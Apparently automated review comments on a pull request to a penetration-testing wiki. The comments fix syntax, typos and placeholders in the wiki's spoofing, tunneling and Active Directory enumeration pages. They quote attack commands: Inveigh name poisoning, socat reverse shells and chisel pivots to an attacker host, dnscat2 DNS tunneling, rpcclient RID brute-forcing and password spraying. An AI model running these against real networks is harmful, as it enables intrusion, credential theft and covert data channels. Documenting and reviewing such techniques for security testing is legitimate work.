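Review bot: in the spoofing page hunk that adds the Inveigh examples, `Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y` has a bare `Y` before `-NBNS` with no parameter name while every other switch on the line is named; either bind it to its switch or drop it so the example runs as shown. The C# line `Inveigh.exe` is fenced as `bash` although it runs on Windows, so `powershell` or `cmd` would be the accurate tag. The sentence that adds the wiki link still carries an empty bold marker (`**** that lists all parameters`). While this file is open, the context heading `## NTML Relay Attack` should read `## NTLM Relay Attack`.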
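Review bot: in the tunneling page's chisel hunk, the new `./chisel server -v -p 8080 --socks5` on the victim starts a SOCKS server that anyone able to reach port 8080 can use, because no `--auth user:pass` is given; the comment already says the port must be exposed, so add `--auth` on the server line and on the matching `./chisel client -v 10.10.10.10:8080 socks` line (chisel supports it on both sides) so the pivot is not an open proxy on the target network. The same applies to the `--reverse` server on the attacker side, which otherwise accepts any client.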
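Review bot: in the socat hunk, the host and port placeholders render as empty, e.g. `socat FILE:\`tty\`,raw,echo=0 TCP4::1337` and `socat TCP4-LISTEN:,fork TCP4:: &`; if the source uses `<ip>` / `<port>` angle-bracket placeholders, the renderer is swallowing them as HTML tags, so escaping them or using a form like `ATTACKER_IP:PORT` would keep the examples readable. The `TCP4` change itself is consistent with the `TCP4::1337` already used in the reverse-shell context line.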
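Review bot: in the moved `netsh` section and the new SocksOverRDP section, the `SocksOverRDP-Server.exe` and `netstat -antb | findstr 1080` fences have no language tag while the rest of the file tags its blocks, and the `netsh` block is tagged `bash` although it is a Windows `cmd` command; consistent tags help readers and tooling. Typo in "confirm in you machine (attacker)": should be "your machine". The netsh section states that local admin is required; the SocksOverRDP steps do not, although `regsvr32.exe SocksOverRDP-Plugin.dll` typically also needs an elevated prompt to register the DLL, and `netstat -b` needs elevation too, so a one-line note would keep the two sections consistent.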
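Review bot: in the DNSCat2 hunk, the added internal-network example has the server listening on `port=53` (`--dns host=10.10.10.10,port=53,domain=mydomain.local`) but the victim connecting to `port=5353`, so as written the two sides do not meet unless something forwards 5353 to 53; align the ports. Also check the client option key against the dnscat2 client's `--dns` help: the client takes `server=...,port=...,domain=...`, while `host=` is the ruby server's key, and the client line omits the domain given to the server. Stray empty bold markers (`****`) precede the download link, the new headings `#### **In PowerShell**` and `#### **Port forwarding with dnscat**` carry bold inside a heading, which the file does not do elsewhere, and the PowerShell block lacks a language tag.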
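Review bot: in the ptunnel-ng hunk, the client line `sudo ptunnel-ng -p -l -r -R` and the server line have every argument placeholder empty, so a reader cannot tell which value is the proxy host, the local port, the remote host and the remote port; label them (`PROXY_HOST`, `LOCAL_PORT`, `REMOTE_HOST`, `REMOTE_PORT`) or give concrete values that match the SSH lines below, which imply `-l 2222` and `-R 22`. `sudo ./autogen.sh` under `# Generate it` should say what it produces, or be followed by the build commands if any are still needed. The `****` before the download link is an empty bold marker, as in the DNSCat2 section.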
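Review bot: the new "LDAP anonymous binds" paragraph in pentesting-ldap.md describes the exposure but not how to check or close it; since it links the Microsoft article on anonymous LDAP operations, a one-line pointer to the `dSHeuristics` setting that article documents (its seventh character set to `2` re-enables anonymous operations) and a note that the `ldapsearch -x -s base -b ''` query in the SNI section above doubles as a quick test would make the section actionable for both sides. The preceding hunk also introduces a stray `+ ` blank line inside the fenced block after the `ldapsearch -H ldaps://company.com:636/` command.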
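Review bot: in the SMB README hunk that adds "Enumerate Users", `ldapsearch ... -h 10.10.10.10` uses the `-h` host option that OpenLDAP deprecated and removed in 2.5 in favour of `-H ldap://10.10.10.10`; the comment `# This info should alerady being gathered from enum4linux and enum4linux-ng` should read `should already have been gathered`; and `(&(objectclass=user))` has a single term, so `(objectclass=user)` says the same. In the earlier hunk of the same file the context sentence about NTLM keeps `insteresting` for `interesting`, cheap to fix while the link path is being changed.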
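Review bot: the rewritten NTLM Theft sentence keeps `can illicit an SMB authentication attempt`; the word is `elicit`.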
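Review bot: in the new rpcclient-enumeration.md, the "Extra commands" table is column-shifted for most rows: `| querygroup | Retrieve group information | |` puts the description in the Interface column and leaves Description empty (same for querydominfo, enumdomusers, enumdomgroups, createdomuser, deletedomuser, lookupsids, lsaaddacctrights, lsaremoveacctrights and dsenumdomtrusts); each row should repeat the interface, e.g. `| querygroup | SAMR | Retrieve group information |`. The intro line `Pat of this section was extracted from book "Network Security Assesment 3rd Edition"` has two typos (`Part`, `Assessment`). The RID loop `for i in $(seq 500 1100)` opens a fresh rpcclient session per RID, about 600 null-session connections that stand out in SMB logs; the `samrdump.py` alternative mentioned in the comment lists users in a single session and is worth showing as a command. Finally, `createdomuser`, `deletedomuser`, `lsaaddacctrights` and `lsaremoveacctrights` are write operations, unlike the rest of the table, and could be flagged so a reader working through the list for enumeration does not modify the domain.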
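Review bot: in the AD methodology README hunk, the two `{% content-ref %}` blocks are inserted at column 0 between nested bullets (`* A more detailed guide ... can be found here:`, then the block, then `* **Enumerate Ldap**`), which ends the list in Markdown and restarts it afterward; either indent the blocks to the nested level or move both links after the list. The context commands `enum4linux -a -u "guest" -p "" `, `smbmap ... -H ` and `smbclient -U 'guest%' -L //` have trailing spaces inside the backticks where the target placeholder has rendered empty, the same angle-bracket issue seen elsewhere in this PR.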
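Review bot: the context line `klist #List tickets in cache to cehck that mimikatz has loaded the ticket` in pass-the-ticket.md has `cehck` for `check`; cheap to fix while the References section is being added.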
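Review bot: in the password-spraying hunk, `enum4linx -u 'username' -p 'password' -P` misspells the tool (`enum4linux`), carried over from the removed bullet, and its target argument is empty. `rpcclient -U "" -N 10.10.10.10;` has a stray trailing semicolon and opens an anonymous null session although the heading says the reader has credentials; `-U 'user%password'` would match the text. `ldapsearch -h 10.10.10.10` uses the removed OpenLDAP option; use `-H ldap://10.10.10.10`. Since this page opens by warning about lockouts, it is worth saying that `net accounts` in the Windows part prints the lockout threshold and observation window, which is what decides how many attempts per window are safe.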
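Review bot: the rewritten line in privileged-groups-and-token-privileges.md still carries an empty bold marker (`**** [**Responder**]`) before the Responder link; since the line is being edited anyway, drop it. Removing the trailing `\` hard line break is right now that a `{% content-ref %}` block follows instead of prose.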